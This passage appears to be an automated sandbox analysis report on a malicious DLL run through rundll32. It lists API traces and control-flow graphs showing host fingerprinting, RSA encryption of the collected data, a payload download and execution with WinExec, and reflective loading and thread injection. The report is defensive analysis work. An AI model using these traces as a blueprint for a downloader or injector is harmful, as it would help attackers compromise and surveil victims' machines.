                    • Associated: 00000000.00000002.89094855256.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.89094883864.0000000000435000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.89095257309.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 72ccadd71a06bf1081c8144345e47d34f7834f5881eba21348e0591e335b0186
                    • Instruction ID: c9c4745f8ce940bcd58fb37baa10aaa24998e04b54fc61a643b04cc763f264f7
                    • Opcode Fuzzy Hash: 72ccadd71a06bf1081c8144345e47d34f7834f5881eba21348e0591e335b0186
                    • Instruction Fuzzy Hash: 5EF012B19043199FD710CF59E94046ABBF4FB49321B50C43EE898D7340D770A944CF65

                    Execution Graph

                    Execution Coverage:28.4%
                    Dynamic/Decrypted Code Coverage:99%
                    Signature Coverage:78.1%
                    Total number of Nodes:105
                    Total number of Limit Nodes:8
                    execution_graph 1841 50922a8 1842 50922e6 1841->1842 1842->1842 1843 509231e VirtualProtect 1842->1843 1844 5091d04 1843->1844 1845 5091d58 VirtualAlloc 1844->1845 1845->1844 1964 3290f4d CreateThread 1965 27ac18cb 46 API calls 1964->1965 1846 32e1dab 1847 32e1dae VirtualProtect 1846->1847 1848 32e1e2d 1847->1848 1849 32e1e66 VirtualProtect 1848->1849 1850 32e1eac 1849->1850 1961 3290f1c CreateEventA WaitForSingleObject 1962 3290777 1961->1962 1963 3290f40 TerminateProcess 1962->1963 1851 5091eaf 1852 5091ed8 1851->1852 1856 51b163d 1852->1856 1859 51b7a20 1856->1859 1860 51b7a65 1859->1860 1861 51b1911 1860->1861 1866 51b71d2 VirtualFree 1860->1866 1869 51ba660 1860->1869 1873 51b22a0 1860->1873 1879 51ba900 1860->1879 1867 51b7176 1866->1867 1867->1866 1868 51b7231 1867->1868 1868->1860 1870 51ba6db 1869->1870 1871 51ba812 1870->1871 1872 51ba757 VirtualAllocExNuma 1870->1872 1871->1860 1872->1870 1875 51b2303 1873->1875 1874 51b6b8b 1874->1860 1875->1874 1876 51ba660 VirtualAllocExNuma 1875->1876 1877 51b71d2 VirtualFree 1875->1877 1883 51b2084 1875->1883 1876->1875 1877->1875 1882 51ba99f 1879->1882 1880 51baabe 1880->1860 1881 51baa2c VirtualProtect 1881->1882 1882->1880 1882->1881 1884 51b2087 NtCreateThreadEx 1883->1884 1885 51b205c 1883->1885 1884->1885 1885->1883 1886 51b2130 1885->1886 1886->1875 1887 3290000 1889 3290005 1887->1889 1905 3290391 GetPEB 1889->1905 1892 3290391 GetPEB 1893 3290031 1892->1893 1894 3290391 GetPEB 1893->1894 1895 329003f 1894->1895 1896 3290391 GetPEB 1895->1896 1898 329004d VirtualAlloc 1896->1898 1902 32900aa 1898->1902 1899 3290378 1900 329020a LoadLibraryA 1900->1902 1901 3290259 LdrGetProcedureAddress 1901->1902 1902->1900 1902->1901 1902->1902 1903 329027c 1902->1903 1903->1899 1904 3290351 VirtualProtect 1903->1904 1904->1903 1906 3290023 1905->1906 1906->1892 1966 5091680 1967 5091c5c 1966->1967 1968 5091d58 VirtualAlloc 1967->1968 1968->1967 1907 27ac18f6 CreateThread 1908 27ac18cb CreateEventA WaitForSingleObject 1907->1908 1911 27ac1120 1908->1911 1912 27ac18a5 TerminateProcess 1911->1912 1913 27ac1137 GetPEB 1911->1913 1913->1912 1914 27ac114b 1913->1914 1914->1912 1915 27ac116c GetTickCount 1914->1915 1915->1912 1916 27ac1188 SHGetValueA 1915->1916 1916->1912 1917 27ac11c7 SHSetValueA UuidCreateSequential sprintf 1916->1917 1918 27ac1244 RtlComputeCrc32 1917->1918 1918->1912 1919 27ac125f GlobalAlloc sprintf 1918->1919 1920 27ac12b7 RtlComputeCrc32 1919->1920 1922 27ac18a9 1920->1922 1924 27ac12db 1920->1924 1923 27ac18b4 GlobalFree 1922->1923 1923->1912 1924->1922 1925 27ac13c7 sprintf 1924->1925 1926 27ac13ed RtlComputeCrc32 1925->1926 1926->1922 1928 27ac1415 1926->1928 1928->1922 1929 27ac1420 sprintf GetModuleFileNameA 1928->1929 1931 27ac145c sprintf GetCommandLineA 1929->1931 1932 27ac1472 sprintf memset CryptBinaryToStringA 1931->1932 1933 27ac1509 sprintf 1932->1933 1935 27ac152f 1933->1935 1934 27ac15df memcpy 1939 27ac166f memcpy 1934->1939 1940 27ac16bb memset GlobalFree CryptAcquireContextA 1934->1940 1935->1934 1936 27ac1550 memset EnumDisplaySettingsA 1935->1936 1937 27ac15ab sprintf 1936->1937 1937->1935 1942 27ac16b1 1939->1942 1940->1912 1941 27ac1711 CryptDecodeObjectEx 1940->1941 1941->1912 1943 27ac1746 CryptImportPublicKeyInfo 1941->1943 1942->1940 1943->1912 1944 27ac1763 CryptEncrypt 1943->1944 1944->1912 1945 27ac1782 CryptBinaryToStringA memset GlobalFree 1944->1945 1950 27ac17f7 URLDownloadToCacheFileA lstrlen memset GlobalFree 1945->1950 1948 27ac185f _lopen 1949 27ac188a 1948->1949 1951 27ac1875 _hread _lclose 1948->1951 1949->1912 1952 27ac1896 WinExec 1949->1952 1950->1948 1950->1949 1951->1949 1952->1912 1953 32e1151 1954 32e1166 1953->1954 1957 32e2222 VirtualAlloc 1954->1957 1956 32e1189 1958 32e22c3 1957->1958 1958->1956 1959 32e1eb1 VirtualProtect 1960 32e1fcb 1959->1960

                    Executed Functions

                    Function 27AC1120 Relevance: 96.8, APIs: 42, Strings: 13, Instructions: 569encryptionprocessmemoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 27ac1120-27ac1131 1 27ac18be 0->1 2 27ac1137-27ac1145 GetPEB 0->2 3 27ac18c0-27ac18ca 1->3 2->1 4 27ac114b-27ac1154 2->4 4->1 5 27ac115a-27ac1166 4->5 5->1 6 27ac116c-27ac1182 GetTickCount 5->6 6->1 7 27ac1188-27ac11c1 SHGetValueA 6->7 7->1 8 27ac11c7-27ac1259 SHSetValueA UuidCreateSequential sprintf RtlComputeCrc32 7->8 8->1 10 27ac125f-27ac12d5 GlobalAlloc sprintf RtlComputeCrc32 8->10 13 27ac18a9-27ac18b8 call 27ac1923 GlobalFree 10->13 14 27ac12db-27ac12e0 10->14 13->1 14->13 15 27ac12e6-27ac12eb 14->15 15->13 17 27ac12f1-27ac12f6 15->17 17->13 19 27ac12fc-27ac1301 17->19 19->13 21 27ac1307-27ac130c 19->21 21->13 22 27ac1312-27ac1317 21->22 22->13 23 27ac131d-27ac1322 22->23 23->13 24 27ac1328-27ac132d 23->24 24->13 25 27ac1333-27ac1338 24->25 25->13 26 27ac133e-27ac1343 25->26 26->13 27 27ac1349-27ac134e 26->27 27->13 28 27ac1354-27ac1359 27->28 28->13 29 27ac135f-27ac1364 28->29 29->13 30 27ac136a-27ac136f 29->30 30->13 31 27ac1375-27ac137a 30->31 31->13 32 27ac1380-27ac1385 31->32 32->13 33 27ac138b-27ac1390 32->33 33->13 34 27ac1396-27ac139b 33->34 34->13 35 27ac13a1-27ac13a6 34->35 35->13 36 27ac13ac-27ac13b1 35->36 36->13 37 27ac13b7-27ac140f sprintf RtlComputeCrc32 36->37 37->13 41 27ac1415-27ac141a 37->41 41->13 42 27ac1420-27ac152a sprintf GetModuleFileNameA sprintf GetCommandLineA sprintf memset CryptBinaryToStringA sprintf 41->42 47 27ac15c9-27ac15d9 42->47 49 27ac152f-27ac153a 47->49 50 27ac15df-27ac166d memcpy 47->50 51 27ac153c-27ac154e call 27ac1911 49->51 52 27ac15b6-27ac15c8 49->52 60 27ac166f-27ac16a7 memcpy 50->60 61 27ac16bb-27ac170b memset GlobalFree CryptAcquireContextA 50->61 51->52 56 27ac1550-27ac15b3 memset EnumDisplaySettingsA sprintf 51->56 52->47 56->52 63 27ac16b1-27ac16b5 60->63 61->1 62 27ac1711-27ac1740 CryptDecodeObjectEx 61->62 62->1 64 27ac1746-27ac175d CryptImportPublicKeyInfo 62->64 63->61 64->1 65 27ac1763-27ac177c CryptEncrypt 64->65 65->1 66 27ac1782-27ac178e 65->66 67 27ac1790-27ac17b1 66->67 68 27ac17b3-27ac17f9 CryptBinaryToStringA memset GlobalFree 66->68 67->67 67->68 72 27ac17fb-27ac1801 68->72 73 27ac1824-27ac185d URLDownloadToCacheFileA lstrlen memset GlobalFree 68->73 74 27ac1809-27ac180c 72->74 75 27ac1803-27ac1807 72->75 76 27ac185f-27ac1873 _lopen 73->76 77 27ac188a-27ac1894 73->77 79 27ac180e-27ac1812 74->79 80 27ac1814-27ac1817 74->80 78 27ac1819-27ac181c 75->78 76->77 81 27ac1875-27ac1884 _hread _lclose 76->81 82 27ac18a5-27ac18a7 77->82 83 27ac1896-27ac189f WinExec 77->83 78->72 85 27ac181e 78->85 79->78 80->78 84 27ac1820 80->84 81->77 82->3 83->82 84->73 85->73
                    APIs
                    • GetTickCount.KERNEL32 ref: 27AC116C
                    • SHGetValueA.SHLWAPI(80000001,SOFTWARE\Microsoft\Mediaplayer,COMPUTERNAME,?,?), ref: 27AC11B9
                    • SHSetValueA.SHLWAPI(80000001,SOFTWARE\Microsoft\Mediaplayer,COMPUTERNAME,00000001,?), ref: 27AC11E0
                    • UuidCreateSequential.RPCRT4(?), ref: 27AC11F5
                    • sprintf.NTDLL ref: 27AC122C
                    • RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 27AC124F
                    • GlobalAlloc.KERNEL32(00000040,00001000,00000000,?,00000000), ref: 27AC1266
                    • sprintf.NTDLL ref: 27AC128C
                    • RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 27AC12CB
                    • sprintf.NTDLL ref: 27AC13CA
                    • RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 27AC1401
                    • sprintf.NTDLL ref: 27AC1434
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 27AC144A
                    • sprintf.NTDLL ref: 27AC145F
                    • GetCommandLineA.KERNEL32 ref: 27AC1467
                    • sprintf.NTDLL ref: 27AC1475
                    • memset.NTDLL ref: 27AC1482
                    • CryptBinaryToStringA.CRYPT32(?,00000030,4000000C,?,?,?,?,?,00000000,00000030,00000000), ref: 27AC14F3
                    • sprintf.NTDLL ref: 27AC150C
                    • memset.NTDLL ref: 27AC155E
                    • EnumDisplaySettingsA.USER32(?,000000FF,?), ref: 27AC1578
                    • sprintf.NTDLL ref: 27AC15AE
                    • memcpy.NTDLL(0000000C,00000000,?), ref: 27AC165B
                    • memcpy.NTDLL(00000080,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000030,00000000), ref: 27AC167D
                    • memset.NTDLL ref: 27AC16BF
                    • GlobalFree.KERNEL32(00000000), ref: 27AC16C8
                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,?,00000000,?,00000000), ref: 27AC1703
                    • CryptDecodeObjectEx.CRYPT32(00010001,00000008,27AC1000,000000A2,00008000,00000000,?,00000000), ref: 27AC1738
                    • CryptImportPublicKeyInfo.CRYPT32(?,00000001,?,?), ref: 27AC1755
                    • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000,00000080), ref: 27AC1774
                    • CryptBinaryToStringA.CRYPT32(00000000,?,40000001,?,00000000), ref: 27AC17D6
                    • memset.NTDLL ref: 27AC17E3
                    • GlobalFree.KERNEL32(00000000), ref: 27AC17EC
                    • URLDownloadToCacheFileA.URLMON(00000000,00000000,?,00000105,00000000,00000000), ref: 27AC183B
                    • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000105,00000000,00000000,?,?,?,?,?,?,00000000,?,00000000), ref: 27AC1843
                    • memset.NTDLL ref: 27AC184C
                    • GlobalFree.KERNEL32(00000000), ref: 27AC1855
                    • _lopen.KERNEL32(?,00000000), ref: 27AC1868
                    • _hread.KERNEL32(00000000,?,00000002), ref: 27AC187D
                    • _lclose.KERNEL32(00000000), ref: 27AC1884
                    • WinExec.KERNEL32(?,00000000), ref: 27AC189F
                    • GlobalFree.KERNEL32(00000000), ref: 27AC18B8
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.84975565291.0000000027AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 27AC1000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_27ac1000_rundll32.jbxd
                    Similarity
                    • API ID: sprintf$Crypt$Globalmemset$Free$ComputeCrc32$BinaryFileStringValuememcpy$AcquireAllocCacheCommandContextCountCreateDecodeDisplayDownloadEncryptEnumExecImportInfoLineModuleNameObjectPublicSequentialSettingsTickUuid_hread_lclose_lopenlstrlen
                    • String ID: %02x%02x%02x%02x%02x%02x$%08x%08x*%s*%u$*%s$*%s_%s_%u_%u_%u$0$COMPUTERNAME$SOFTWARE\Microsoft\Mediaplayer$USERNAME$lol/$s://$w0t.$wnp^$?kL
                    • API String ID: 3929119689-2541717829
                    • Opcode ID: cbe10f6ba930fff9b99e63469f94eef1096c7ab02c519e9caa091d67d897b52f
                    • Instruction ID: d1afb5b641d7297c3d98dbba34a3546c4b9938a4bc15ba799c89e36e1a3fbf9a
                    • Opcode Fuzzy Hash: cbe10f6ba930fff9b99e63469f94eef1096c7ab02c519e9caa091d67d897b52f
                    • Instruction Fuzzy Hash: 351291B1A08345BFE720DF64CD84FAB7BECBB94361F10492EF695D2141DA3899448B63
                    Function 051B22A0 Relevance: 9.0, Strings: 2, Instructions: 6457COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 86 51b22a0-51b22fb 87 51b2303-51b233f 86->87 87->87 88 51b2341-51b24bb 87->88 89 51b24c2-51b24d1 88->89 90 51b24d7-51b252f 89->90 91 51b2636-51b2644 89->91 92 51b2563-51b25f1 call 51b2084 90->92 93 51b2531 90->93 94 51b2692-51b26a2 91->94 95 51b2646-51b268d 91->95 101 51b25f3-51b2631 92->101 96 51b2533-51b255a 93->96 98 51b26f9-51b270c 94->98 99 51b26a4-51b26f4 94->99 97 51b2850-51b285f 95->97 96->96 100 51b255c 96->100 102 51b3d68-51b3d7a 97->102 103 51b2865-51b289d 97->103 104 51b273a-51b274c 98->104 105 51b270e-51b2735 98->105 99->97 100->92 101->97 108 51b3da8-51b3db8 102->108 109 51b3d7c-51b3da3 102->109 110 51b2968-51b2b7f 103->110 111 51b28a3-51b28a6 103->111 106 51b2752-51b27ba call 51b1450 call 51ba660 104->106 107 51b27d7-51b27e6 104->107 105->97 139 51b27bc-51b27d5 106->139 115 51b27e8-51b2802 107->115 116 51b2804-51b2813 107->116 117 51b3dba-51b3dc9 108->117 118 51b3dce-51b3de0 108->118 109->89 112 51b2f15-51b2f9e 110->112 113 51b2b85-51b2b8d 110->113 119 51b295e-51b2962 111->119 120 51b28ac-51b2957 111->120 124 51b2fd0-51b30a7 112->124 125 51b2fa0-51b2fa3 112->125 121 51b2efb-51b2f0f 113->121 122 51b2b93-51b2ef9 113->122 115->97 126 51b2837-51b284a 116->126 127 51b2815-51b2835 116->127 117->89 128 51b515f-51b5171 118->128 129 51b3de6-51b494b 118->129 119->110 119->111 120->119 121->112 121->113 122->121 134 51b30a9-51b30af 124->134 135 51b30e4-51b30ef 124->135 130 51b2fca-51b2fce 125->130 131 51b2fa5-51b2fc3 125->131 126->97 136 51b6b8b-51b6b9e 126->136 127->97 132 51b51e3-51b51f2 128->132 133 51b5173-51b51cd call 51b71d2 128->133 137 51b4a0f-51b4a32 129->137 138 51b4951-51b4957 129->138 130->124 130->125 131->130 142 51b5212-51b5225 132->142 143 51b51f4-51b520d 132->143 153 51b51cf-51b51de 133->153 140 51b30de-51b30e2 134->140 141 51b30b1-51b30d7 134->141 146 51b31a8-51b3734 135->146 147 51b30f5-51b30f8 135->147 148 51b4a38-51b4a40 137->148 149 51b4e91-51b5066 137->149 144 51b495d-51b49fe 138->144 145 51b4a05-51b4a09 138->145 139->97 140->134 140->135 141->140 154 51b5227-51b5241 142->154 155 51b5246-51b5258 142->155 143->89 144->145 145->137 145->138 150 51b373a-51b3742 146->150 151 51b3d20-51b3d63 146->151 156 51b319e-51b31a2 147->156 157 51b30fe-51b319c 147->157 158 51b4e77-51b4e8b 148->158 159 51b4a46-51b4e75 148->159 152 51b506d-51b5070 149->152 160 51b3748-51b3d04 150->160 161 51b3d06-51b3d1a 150->161 151->89 162 51b510e-51b5112 152->162 163 51b5076-51b510c 152->163 153->89 154->89 164 51b57d8-51b57ea 155->164 165 51b525e-51b57d3 155->165 156->146 156->147 157->156 158->148 158->149 159->158 160->161 161->150 161->151 162->152 168 51b5118-51b515a 162->168 163->162 166 51b66fe-51b6710 164->166 167 51b57f0-51b5b54 164->167 165->89 166->89 171 51b6716-51b688c 166->171 170 51b5b56-51b5b59 167->170 168->89 172 51b5b5b-51b5b81 170->172 173 51b5b83-51b5b87 170->173 174 51b6952-51b6954 171->174 175 51b6892 171->175 172->173 173->170 177 51b5b89-51b5e93 173->177 176 51b6959-51b695b 174->176 178 51b6897-51b689d 175->178 181 51b695d-51b6981 176->181 182 51b6984-51b6988 176->182 183 51b5e99-51b5ea1 177->183 184 51b5f5e-51b66f9 177->184 179 51b6948-51b694c 178->179 180 51b68a3-51b6946 178->180 179->174 179->178 180->179 181->182 182->176 185 51b698a-51b6a9a 182->185 186 51b5f4f-51b5f58 183->186 187 51b5ea7-51b5f4d 183->187 184->89 188 51b6a9f-51b6aa2 185->188 186->183 186->184 187->186 189 51b6ac8-51b6acc 188->189 190 51b6aa4-51b6ac5 188->190 189->188 191 51b6ace-51b6b86 189->191 190->189 191->89
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.84974409517.00000000051B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 051B1000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_51b1000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: 5`oj$5`oj
                    • API String ID: 0-1924437217
                    • Opcode ID: 02acf7ec11d640ac9f3017bec193d97360015263b7909136a701dde5258c969b
                    • Instruction ID: 60fce56bd8fc4d7551f33c4ba5fdad6d29dcb9b92d4f09529c7161823ec92507
                    • Opcode Fuzzy Hash: 02acf7ec11d640ac9f3017bec193d97360015263b7909136a701dde5258c969b
                    • Instruction Fuzzy Hash: 5093F77BB546114BD72CCE6DCCD12E9A6C76BCC314F1ED63E884ADB398DDB898064680
                    Function 03290005 Relevance: 6.3, APIs: 4, Instructions: 336memorylibraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 195 3290005-3290065 call 3290391 * 4 204 3290067 195->204 205 3290086-32900a8 VirtualAlloc 195->205 206 3290069-3290070 204->206 207 32900b9-32900c5 205->207 208 32900aa-32900b7 205->208 209 3290072 206->209 210 3290075-3290084 206->210 211 32900dd-32900f7 207->211 212 32900c7-32900cc 207->212 208->207 209->210 210->205 210->206 214 32900f9 211->214 215 3290132-329013b 211->215 213 32900ce-32900d8 212->213 213->213 217 32900da 213->217 218 32900fb-32900ff 214->218 219 32901ea-32901f1 215->219 220 3290141-3290148 215->220 217->211 221 3290101 218->221 222 3290122-3290130 218->222 224 3290280-329028f 219->224 225 32901f7-3290208 219->225 220->219 223 329014e-3290159 220->223 226 3290105-3290118 221->226 222->215 222->218 223->219 229 329015f 223->229 227 3290378-329038e 224->227 228 3290295-3290298 224->228 225->224 230 329020a-3290222 LoadLibraryA 225->230 226->226 231 329011a-329011e 226->231 232 329029d-32902a0 228->232 233 3290161-3290164 229->233 234 329026e-329027a 230->234 235 3290224 230->235 231->222 238 3290368-3290372 232->238 239 32902a6-32902b0 232->239 240 32901d2-32901d9 233->240 234->230 237 329027c 234->237 241 3290226 235->241 237->224 238->227 238->232 246 32902bd-32902bf 239->246 247 32902b2-32902b4 239->247 244 32901db-32901e0 240->244 245 3290166-3290177 240->245 242 3290228-329022f 241->242 243 3290231-329023a 241->243 250 3290259-3290268 LdrGetProcedureAddress 242->250 251 329023c-3290241 243->251 252 3290243-3290258 243->252 244->233 253 32901e6 244->253 255 3290179-3290193 245->255 256 3290195-3290199 245->256 248 32902f1-32902f3 246->248 249 32902c1-32902c3 246->249 247->246 254 32902b6-32902b8 247->254 263 32902fd-32902ff 248->263 264 32902f5-32902f7 248->264 258 32902cd-32902cf 249->258 259 32902c5-32902c7 249->259 250->241 262 329026a 250->262 251->251 251->252 252->250 253->219 254->246 265 32902ba-32902bb 254->265 257 32901cd-32901d0 255->257 260 32901a8-32901ae 256->260 261 329019b-32901a6 256->261 257->240 258->248 271 32902d1-32902d3 258->271 259->258 268 32902c9-32902cb 259->268 269 32901b0-32901b5 260->269 270 32901b7-32901bd 260->270 261->257 262->234 266 329033b 263->266 267 3290301-3290303 263->267 264->263 272 32902f9-32902fb 264->272 273 329031f-3290323 265->273 281 329033f-3290346 266->281 274 3290310-3290312 267->274 275 3290305-3290307 267->275 276 329031e 268->276 277 32901c2-32901ca 269->277 270->257 278 32901bf 270->278 279 32902dd-32902df 271->279 280 32902d5-32902d7 271->280 272->276 273->281 274->266 283 3290314-3290316 274->283 275->274 282 3290309-329030e 275->282 276->273 277->257 278->277 279->248 285 32902e1-32902e3 279->285 280->279 284 32902d9-32902db 280->284 286 3290348-329034d 281->286 287 3290351-3290363 VirtualProtect 281->287 282->273 288 3290318-329031a 283->288 289 3290325-3290327 283->289 284->276 290 32902ed-32902ef 285->290 291 32902e5-32902e7 285->291 286->287 287->238 288->289 292 329031c 288->292 289->266 293 3290329-329032b 289->293 290->248 290->266 291->290 294 32902e9-32902eb 291->294 292->276 293->266 295 329032d-3290339 293->295 294->276 295->273
                    APIs
                    • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 032900A0
                    • LoadLibraryA.KERNEL32(?), ref: 0329020D
                    • LdrGetProcedureAddress.NTDLL(00000000,?,00000000,?), ref: 0329025A
                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 0329035F
                    Memory Dump Source
                    • Source File: 00000003.00000002.84973393718.0000000003290000.00000020.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3290000_rundll32.jbxd
                    Similarity
                    • API ID: Virtual$AddressAllocLibraryLoadProcedureProtect
                    • String ID:
                    • API String ID: 3829562780-0
                    • Opcode ID: 3c0398302410d883315648ee21e8cbdebfa52049138ef01b04af12db65d8c14a
                    • Instruction ID: 8b707dcaff33af6dc29dddc6552701ab47bdd32c94d5515fd41254078bcb9937
                    • Opcode Fuzzy Hash: 3c0398302410d883315648ee21e8cbdebfa52049138ef01b04af12db65d8c14a
                    • Instruction Fuzzy Hash: 30B1AE75A2430A9BEF18CF19C89077AB7E9BF88704F58846EE942CB241E774E8C1C755
                    Function 0683112C Relevance: 5.0, APIs: 3, Instructions: 540memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNEL32(?,?,?,?), ref: 06831321
                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 06831627
                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 068316ED
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180388238.0000000006831000.00000020.00001000.00020000.00000000.sdmp, Offset: 06831000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6831000_rundll32.jbxd
                    Similarity
                    • API ID: Virtual$Protect$Alloc
                    • String ID:
                    • API String ID: 2541858876-0
                    • Opcode ID: cf9569ba81d9787a9a6e9d53b9afc1cb5ac2ad74d405ff41cf0717cb2915b627
                    • Instruction ID: 5d6fda225d8032c76188662a1bd5a94ed341b24036d482ac1c580fe081cc5200
                    • Opcode Fuzzy Hash: cf9569ba81d9787a9a6e9d53b9afc1cb5ac2ad74d405ff41cf0717cb2915b627
                    • Instruction Fuzzy Hash: AD228E76E001298FDB58CF29CC456EDB7B6BF89314F29C199D449AB344DB70AD828F80
                    Function 06987F59 Relevance: 5.0, Strings: 1, Instructions: 3784COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: R4Vd
                    • API String ID: 0-3306949354
                    • Opcode ID: 9ec2c6bc56d9088785db9a1a2637afaca2e458cd132236148dfec7a9104e842f
                    • Instruction ID: e5225560412135300e374e1ffd17268fa6eb6bf29d9a50f6e025a92f8e1a6e29
                    • Opcode Fuzzy Hash: 9ec2c6bc56d9088785db9a1a2637afaca2e458cd132236148dfec7a9104e842f
                    • Instruction Fuzzy Hash: D273C3726097818FD774DF28C980BABB7E6BFC9310F158A1DD499DB694DB30A801CB52
                    Function 06968DA0 Relevance: 5.0, Strings: 3, Instructions: 1242COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: !$MSR$ecf
                    • API String ID: 0-784032842
                    • Opcode ID: 224643889a938e8c6bda6f687b6b7ef9da2da3e5ab05ad7be0ff68abec53681e
                    • Instruction ID: 74cc4681f75dfcfdafd9766df308c2390e88df9593f41fad42d2d4f93861e10f
                    • Opcode Fuzzy Hash: 224643889a938e8c6bda6f687b6b7ef9da2da3e5ab05ad7be0ff68abec53681e
                    • Instruction Fuzzy Hash: 9CB29F726087828FD774CF29C9847EAB7E6BBC9310F158A1DE499CB794DB309845CB42
                    Function 0533E58D Relevance: 4.9, APIs: 2, Instructions: 2374memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,?,?,?), ref: 0533E679
                    • VirtualAlloc.KERNEL32(00000000,?,?,?), ref: 0533F73C
                    Memory Dump Source
                    • Source File: 00000003.00000003.84148886109.000000000533D000.00000020.00001000.00020000.00000000.sdmp, Offset: 0533D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_533d000_rundll32.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 4ef5e6f3f24ca39d9c83c0dc6a6c31688bf2c78410e3a90c5f5409f422b3077b
                    • Instruction ID: ab8d154e5ab71a9009f86f2eddfa90f5c5139a17c23431d389af383ff0ebf8ac
                    • Opcode Fuzzy Hash: 4ef5e6f3f24ca39d9c83c0dc6a6c31688bf2c78410e3a90c5f5409f422b3077b
                    • Instruction Fuzzy Hash: FD031A36A047618FD728CE29C4D57DAB3E7BFC4310F498A3DD889CB645DB7498498B81
                    Function 0696DB70 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 216fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindNextFileW.KERNEL32(?,?), ref: 0696DCD2
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: FileFindNext
                    • String ID: L
                    • API String ID: 2029273394-2909332022
                    • Opcode ID: 67f8e1e1a47774552d9918b939aecb38e07befeb6cb6882da394a71afff741f8
                    • Instruction ID: f04b1c3b8ef5cb55aa165d70aa29760f923ae8b15c9cfb04efb28b402ea31c83
                    • Opcode Fuzzy Hash: 67f8e1e1a47774552d9918b939aecb38e07befeb6cb6882da394a71afff741f8
                    • Instruction Fuzzy Hash: 6D91AD32A087518FD710CF29C88065AB7E2FFC9314F268A29E9A59B354D774F806CB91
                    Function 06961370 Relevance: 3.4, Strings: 2, Instructions: 946COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$t
                    • API String ID: 0-777169037
                    • Opcode ID: 00ee968eb86e2acb1b7c73acc9403356742f36b71a7702d82bfe09c9aa654095
                    • Instruction ID: 1ea99a5e842f0cb3f85edfa571bc5079391d23af38146fdca83d855725d3d77b
                    • Opcode Fuzzy Hash: 00ee968eb86e2acb1b7c73acc9403356742f36b71a7702d82bfe09c9aa654095
                    • Instruction Fuzzy Hash: CE8261326193818FD774CF29C5C4BAEB7E6BFC9310F258A2DD4898B654DB30A945CB81
                    Function 06982360 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 194sleepCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID: 'RX0
                    • API String ID: 3472027048-656561589
                    • Opcode ID: b46c6020b1f91a003066ea05d460942125ac22ade54cf7140133a1bb6b291a75
                    • Instruction ID: 2b9f4095d769748cdb81313943a5950ead8d42f7a9b2fbe37e4ec11c615641cd
